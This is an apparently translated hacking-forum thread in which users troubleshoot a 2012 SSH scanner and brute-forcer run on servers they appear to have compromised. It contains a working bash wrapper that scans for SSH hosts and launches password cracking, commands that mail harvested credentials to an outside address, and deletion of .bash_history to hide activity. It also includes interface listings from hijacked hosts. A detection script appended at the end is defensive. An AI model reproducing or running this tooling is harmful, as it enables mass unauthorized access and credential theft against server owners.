caramea

SSH Scanner+Bruteforce 2012


Posted (edited)

Hint1: Same shit 3x

Hint2: it's too easy, bro

I'll try the scanner when I get home, I'm at a friend's place at the moment

Edited by tm03ewn
Posted

@alecseu: Not only is it free and good quality, you also have demands. What log, what scan, when it's on Linux? And besides, did I force you to download it? I say mind your own business.

Posted

Why does it give me this error? What do I have to do to make it work?

[wn] Scanning 62.203 for open ssh ips.
cat: bios.txt: No such file or directory
[sSH] Found 0 ip's
[wn] Cracking started
# DO NOT SHARE THIS FUCKING SHIT
rm: cannot remove `/root/.bash_history': Read-only file system
touch: cannot touch `/root/.bash_history': Read-only file system

Posted
It's awesome. Sorry for butting in.

cat vuln.log | sort|uniq|mail -s "ChannelHelp SSHv2" test@test.com &>/dev/null&

Did you at least read readme.txt? :|

@koba did you set the correct network interface, the one you go out to the net through?

Posted
@koba Do you have uid0 on the server? ;\

@caramea: No. I didn't read readme.txt. Many won't read it.

But that doesn't interest me; on top of being spoon-fed, it also has defects. That's how it is when you post on Romanian forums.

@koba: Still, I don't think you set the network interface correctly, run an ifconfig.

Posted

I think I set it correctly, I have another scanner on this root and that one works fine, it's just slow..

eth0 Link encap:Ethernet HWaddr 00:0d:b9:21:e0:04
inet addr:172.17.3.56 Bcast:172.17.3.255 Mask:255.255.255.0
inet6 addr: fe80::20d:b9ff:fe21:e004/64 Scope:Link
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:132032845 errors:0 dropped:0 overruns:0 frame:0
TX packets:517955485 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3628271658 (3.3 GiB) TX bytes:3879094384 (3.6 GiB)
Interrupt:10 Base address:0x8000

eth0:1 Link encap:Ethernet HWaddr 00:0d:b9:21:e0:04
inet addr:172.17.3.49 Bcast:172.17.3.255 Mask:255.255.255.0
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
Interrupt:10 Base address:0x8000

eth1 Link encap:Ethernet HWaddr 00:0d:b9:21:e0:05
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20d:b9ff:fe21:e005/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:58575121 errors:0 dropped:0 overruns:0 frame:0
TX packets:76984193 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3597993480 (3.3 GiB) TX bytes:4094441184 (3.8 GiB)
Interrupt:11 Base address:0xc000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:54 errors:0 dropped:0 overruns:0 frame:0
TX packets:54 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:7832 (7.6 KiB) TX bytes:7832 (7.6 KiB)

Posted

@caramea I tried it on BackTrack, it gives me this error ..

Found 1320 ips
Cracking started
Recieved unhandled msg 4
Recieved unhandled msg 4
Recieved unhandled msg 4

and after that it stopped

Posted
@koba Do you have uid0 on the server? ;\

@caramea: No. I didn't read readme.txt. Many won't read it.

Just as many won't read what those scripts in there do either:

cat vuln.log | mail -s "ChannelHelp Scan Result" estifericit@gmail.com

in the "clean" file.

Posted
Just as many won't read what those scripts in there do either:

cat vuln.log | mail -s "ChannelHelp Scan Result" estifericit@gmail.com

in the "clean" file.

It's not mine, thanks for pointing it out. Still, for me it doesn't save anything to vuln.log, it only prints them to the console.

Posted
It's not mine, thanks for pointing it out. Still, for me it doesn't save anything to vuln.log, it only prints them to the console.

the line is commented out

#echo "[SSH] Username: $(echo $line |cut -d ":" -f 1) Password: $(echo $line |cut -d ":" -f 2) IP: $(echo $line |cut -d ":" -f 3)" >>vuln.log

from eof. You can delete that mail, uncomment the line, and it will create vuln.log for you too

Posted

I have a problem, so to speak: I tried the scanner on 12+ servers [roots], all of them had eth0 and le , some had eth0, eth1

but I get the same error:


tomcat@Caravella:/dev/shm/moloz> ./wn b 208.53 eth0 9
[SSH] LOADING ....

#####################################
## ChannelHelp @ UNDERNET ##
## Powered by wn ##
## 2012 SSHv2 Bruteforcer ##
## Contact me at wnback@yahoo.com ##
#####################################
[wn] Scanning 208.53 for open ssh ips.
cat: bios.txt: No such file or directory
[SSH] Found 0 ip's
[wn] Cracking started
# DO NOT SHARE THIS FUCKING SHIT
rm: cannot lstat `/root/.bash_history': Permission denied
touch: cannot touch `/root/.bash_history': Permission denied

and then it stops :)

I get the same error on absolutely all the roots

any thoughts?

Posted

For that synscan you need eth0 / eth1.

Replace class with a pscan2/pscan.

In wn, change the line with "./class bla bla" to ./pscan2 $1 22

And change the name of the file it saves the IPs in from bios.txt to $1.pscan.22 :)

Good luck. ;-)

Posted

@alecseu

almost the same [2 extra errors]


[SSH] LOADING ....

#####################################
## ChannelHelp @ UNDERNET ##
## Powered by wn ##
## 2012 SSHv2 Bruteforcer ##
## Contact me at wnback@yahoo.com ##
#####################################
[wn] Scanning 66.5 for open ssh ips.
usec: 1000000, burst packets 50
damn dude, port numbers are in 1 .. 65535
cat: bios.txt: No such file or directory
[SSH] Found 0 ip's
[wn] Cracking started
# DO NOT SHARE THIS FUCKING SHIT
rm: cannot remove `/root/.bash_history': Permission denied
touch: cannot touch `/root/.bash_history': Permission denied

I did what you told me, but nothing

PS: all the servers I tried the scanner on had eth0

for example the one I'm trying now:


susan@firefly:/dev/shm/moloz/moloz$ ifconfig
eth0 Link encap:Ethernet HWaddr 40:40:57:9E:32:F8
inet addr:208.78.102.27 Bcast:208.78.102.255 Mask:255.255.255.0
inet6 addr: fe80::4240:57ff:fe9e:32f8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6429567 errors:0 dropped:0 overruns:0 frame:0
TX packets:4545783 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:691797149 (659.7 MiB) TX bytes:12823382673 (11.9 GiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:33255 errors:0 dropped:0 overruns:0 frame:0
TX packets:33255 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2488755 (2.3 MiB) TX bytes:2488755 (2.3 MiB)

Posted

Dude.

Upload a pscan2 into the folder with the scanner.

Then create a file "a" (for example).

Into that file 'a', copy/paste this:

#!/bin/bash
rm -rf bios.txt mfu.txt *.syn
echo "[wn] Scanning $1 for open ssh ips."
./pscan2 $1 22
cat $1.pscan.22 |sort -u | uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
if [ -f mfu.txt ]; then
echo -e "[SSH] Found $oopsnr2 ip's"
cp mfu.txt $1.syn
echo "[wn] Cracking started"
./update 1500
sleep 30
if [ -f vuln.txt ]; then
echo -e "[SSH] Cleaning Results!"
./clean
else
rm -rf mfu.txt ips
fi
fi

chmod +x a pscan2

./a plm.plm

Look in the clean file, because you need to uncomment a line and delete a sendmail.

Posted

If that shell script was written by wankers, what can I say about the compiled executables. They're compiled and come without source because they do wrapping on top of wrapping. As if the shell script had been written in assembly for a specific architecture. How smart can you be to predict such failed commands as "rm /root/.bash_history" and "touch /root/.bash_history"; I mean, is it a POSIX standard to store commands in such a file? And the rest of you over there run any crap without realizing what it does. Do what you know how to do, and drop the crap if you're not up to it.
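
Added example, not part of the thread and not code from the tool: a static triage check for an untrusted script bundle that flags the two behaviours the posters found by reading the scripts, results piped to `mail`/`sendmail` and `rm`/`touch` aimed at `.bash_history`. The function names `audit_scripts` and `make_sample`, the file names and the sample contents are constructed for illustration.

```shell
#!/bin/sh
# Added example: static triage of an untrusted script bundle.
# Reports file:line:state:finding for
#   mail-exfil      a pipeline that hands data to mail/mailx/sendmail
#   history-tamper  rm/touch/shred/unlink aimed at a shell history file
# state is "disabled" for commented-out lines, "active" otherwise;
# disabled lines are reported because a one-character edit re-enables them.

audit_scripts() {
    find "$1" -type f | sort | while IFS= read -r f; do
        awk -v file="$f" '
            { state = ($0 ~ /^[ \t]*#/) ? "disabled" : "active" }
            /\|[ \t]*(mail|mailx|sendmail)([ \t]|$)/ {
                printf "%s:%d:%s:mail-exfil\n", file, NR, state
            }
            /(^|[ \t;&|])(rm|touch|shred|unlink)[ \t].*\.(bash|zsh|sh)_history/ {
                printf "%s:%d:%s:history-tamper\n", file, NR, state
            }
        ' "$f"
    done
}

# Constructed sample bundle (hypothetical file names and contents).
make_sample() {
    printf '%s\n' '#!/bin/bash' \
        'cat results.log | sort | uniq | mail -s "report" someone@example.invalid' \
        '#echo "saved" >> results.log' > "$1/cleanup.sh"
    printf '%s\n' '#!/bin/bash' 'echo start' \
        'rm -f /root/.bash_history' 'touch /root/.bash_history' \
        '# cat out.log | sendmail someone@example.invalid' > "$1/run.sh"
}

# Stand-alone run over the constructed bundle.
demo_dir=$(mktemp -d)
make_sample "$demo_dir"
audit_scripts "$demo_dir"
rm -rf "$demo_dir"
```

The check only reads text; compiled helpers shipped without source, as in this bundle, need separate analysis.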

This topic is now closed to further replies.

